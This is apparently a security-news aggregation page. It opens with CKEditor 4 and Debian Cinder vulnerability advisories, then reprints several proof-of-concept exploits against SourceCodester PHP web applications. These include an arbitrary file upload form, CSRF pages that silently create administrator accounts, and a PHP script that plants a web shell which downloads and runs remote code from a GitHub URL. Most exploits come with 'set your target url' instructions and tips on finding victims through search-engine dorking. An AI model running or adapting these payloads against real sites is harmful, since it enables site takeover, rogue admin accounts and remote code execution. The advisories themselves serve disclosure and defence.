### Affected packages
The vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.

### Impact
A potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.

The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.

### Patches

The [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.

To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0) . Please be aware of and understand the potential security vulnerabilities associated with its use.

The fix is be available in version 4.25.0-lts.

### Acknowledgements

The CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.

### For more information

Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.

**Affected packages**

The vulnerability has been discovered in Code Snippet GeSHi plugin. All integrators that use GeSHi syntax highlighter on the backend side can be affected.

**Impact**

A potential vulnerability has been discovered in CKEditor 4 Code Snippet GeSHi plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the GeSHi syntax highlighter library hosted by the victim.

The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.

**Patches**

The GeSHi library is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.

To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the GeSHi library . Please be aware of and understand the potential security vulnerabilities associated with its use.

The fix is be available in version 4.25.0-lts.

**Acknowledgements**

The CKEditor 4 team would like to thank Jiasheng He from Qihoo 360 for recognizing and reporting this vulnerability.

**For more information**

Email us at security@cksource.com if you have any questions or comments about this advisory.

**References**

*   GHSA-7r32-vfj5-c2jv
*   https://nvd.nist.gov/vuln/detail/CVE-2024-43407
*   ckeditor/ckeditor4@71072c9
*   ckeditor/ckeditor4@951e7d7

GHSA-7r32-vfj5-c2jv: Code Snippet GeSHi plugin has reflected cross-site scripting (XSS) vulnerability

Debian Linux Security Advisory 5754-1 - Martin Kaesberger discovered a vulnerability which affects multiple images may result in the disclosure of arbitrary files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5754-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 21, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cinderCVE ID         : CVE-2024-32498Martin Kaesberger discovered a vulnerability which affects multipleOpenStack components (Nova, Glance and Cinder): Malformed QCOW2 diskimages may result in the disclosure of arbitrary files.For the stable distribution (bookworm), this problem has been fixed inversion 2:21.3.1-1~deb12u1.We recommend that you upgrade your cinder packages.For the detailed security status of cinder please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cinderFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbFyK0ACgkQEMKTtsN8TjbX4Q//UEnptocLmd2xjQFiWwKRjzs/63sPfG9jhSMZtEMrhUpXMbBOvAWgYu9b/Cpu6UQufNuJ5u9zPTyb8GQXP5Uy8EHTGSjpVtv2MivuUQ/Hb5JmvWBwJ6Yb2hx7wWB1eb2y9VBGCtHE481dQpgcZoRVxdSi/QsKvaKIOh9bpaEL7kVpRE5BbewKwO/YX1xQ1HgkjF/IOdegcXnLJW3co2930vHUyYRyOE2/HeYFeHbKZLKZQOcruLZy8tXqTrZZb6qP5BFWeQH0pTqyQGUJJ2Qe1LbB8DW9DNRPTsCYocr//gRi40bhgBRv7FQfcWh0AGj6Ka0ItiVB7pBrV6BTtC+uAEqHjzt+ATmb4HlEWnyydwjuMmsso7Qo+yuw2SEiOlqEqO7EkOxrXdTFeaU1mHqoli4JX5+jrIYth9m7LHwi+VoAfKIBIlH8GFs1bPompF1hzdL9Quntvjg2LAI269PbG4taKUi7bH0TTVnDswhkyag0CJPW8T4Rxr3mcLLl1zL4xX+mbFjnp/I2mqGNEcq6z1d/Xn+y9m24k1ZNwVzjeUvbcKdDGZTDEngCdnToAYO9seTXoZ3SUvbys3aLsPhPE69UfWDaOJ1ngbsW9JepALIebRbJ39feAdDYa+JUwdiG44byISprQFwTYWVGi1AlD3kvAT3gnFzm+TMrhxC2KxA==kX3T-----END PGP SIGNATURE-----

Debian Security Advisory 5754-1

Online Diagnostic Lab Management System version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : Online Diagnostic Lab Management System v1.0 Remote File Upload Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : diagnostic/manage_website.php.[+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Upload Website Image</title></head><body>    <form action="http://127.0.0.1/diagnostic/manage_website.php" method="POST" enctype="multipart/form-data">        <label for="website_image">Upload Website Image:</label>        <input type="file" id="website_image" name="website_image" required>        <button type="submit" name="btn_web">Submit</button>    </form></body></html>[+] http://127.0.0.1/diagnostic/assets/uploadImage/Logo/webadmin.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Diagnostic Lab Management System 1.0 Arbitrary File Upload

Online Banking System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 CSRF Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/banking/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Cross Site Request Forgery

Music Gallery Site version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Music Gallery Site v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-music/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name     "indoushka".

[+] Line 19 : Choose a password "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-music\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Music Gallery Site 1.0 Cross Site Request Forgery

Multi-Vendor Online Groceries Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability                                                      |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload add new admin user .

[+] save payload as poc.html 

[+] line 27 Set your target url

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Multi-Vendor Online Groceries Management System 1.0 Cross Site Request Forgery

Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Registration Form</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;            padding: 20px;            max-width: 600px;            background-color: #f4f4f4;            border-radius: 8px;        }        .form-container {            display: flex;            flex-direction: column;        }        .form-group {            margin-bottom: 15px;        }        .form-group label {            font-weight: bold;            margin-bottom: 5px;            display: block;        }        .form-group input, .form-group select {            padding: 8px;            width: 100%;            border: 1px solid #ccc;            border-radius: 4px;        }        .form-group select {            cursor: pointer;        }        .form-group button {            padding: 10px 15px;            background-color: #007bff;            color: white;            border: none;            cursor: pointer;            border-radius: 4px;        }        .form-group button:hover {            background-color: #0056b3;        }    </style></head><body>    <h2>Registration Form</h2>    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">        <div class="form-group">            <label for="firstname">First Name:</label>            <input type="text" id="firstname" name="firstname" required>        </div>        <div class="form-group">            <label for="nid">National ID (NID):</label>            <input type="text" id="nid" name="nid" required>        </div>        <div class="form-group">            <label for="gender">Gender:</label>            <select id="gender" name="gender" required>                <option value="">Select Gender</option>                <option value="male">Male</option>                <option value="female">Female</option>            </select>        </div>        <div class="form-group">            <label for="email">Email:</label>            <input type="email" id="email" name="email" required>        </div>        <div class="form-group">            <label for="phonenumber">Phone Number:</label>            <input type="text" id="phonenumber" name="phonenumber" required>        </div>        <div class="form-group">            <label for="jobs">Job:</label>            <select id="jobs" name="jobs" required>                <option value="">Select Job</option>                <option value="doctor">Doctor</option>                <option value="nurse">Nurse</option>                <option value="pharmacist">Pharmacist</option>            </select>        </div>        <div class="form-group">            <label for="province">Province:</label>            <select id="province" name="province" required>                <option value="">Select Province</option>                <option value="province1">Province 1</option>                <option value="province2">Province 2</option>                <option value="province3">Province 3</option>            </select>        </div>        <div class="form-group">            <label for="city">City:</label>            <select id="city" name="city" required>                <option value="">Select City</option>                <option value="city1">City 1</option>                <option value="city2">City 2</option>                <option value="city3">City 3</option>            </select>        </div>        <div class="form-group">            <label for="username">Username:</label>            <input type="text" id="username" name="username" required>        </div>        <div class="form-group">            <label for="password">Password:</label>            <input type="password" id="password" name="password" required>        </div>        <div class="form-group">            <button type="submit">Register</button>        </div>    </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Medical Center Portal 1.0 Cross Site Request Forgery

Event Registration and Attendance System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Event Registration and Attendance System 1.0 CSRF Vulnerability                                                             |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/news_portal/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Event Registration and Attendance System 1.0 Cross Site Request Forgery

Cab Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : cab management system 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15+19 : Set your user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/cms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Cab Management System 1.0 Cross Site Request Forgery

Alphaware E-Commerce System version 1.0 suffers from a code injection vulnerability.

    =============================================================================================================================================| # Title     : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.    combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            // Safely include the content of the remote PHP file            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'add' => '',        'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'product_name' => 'inouva',        'product_price' => '123',        'product_size' => '99',        'brand' => 'N0_name',        'category' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/alphaware/photo/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#php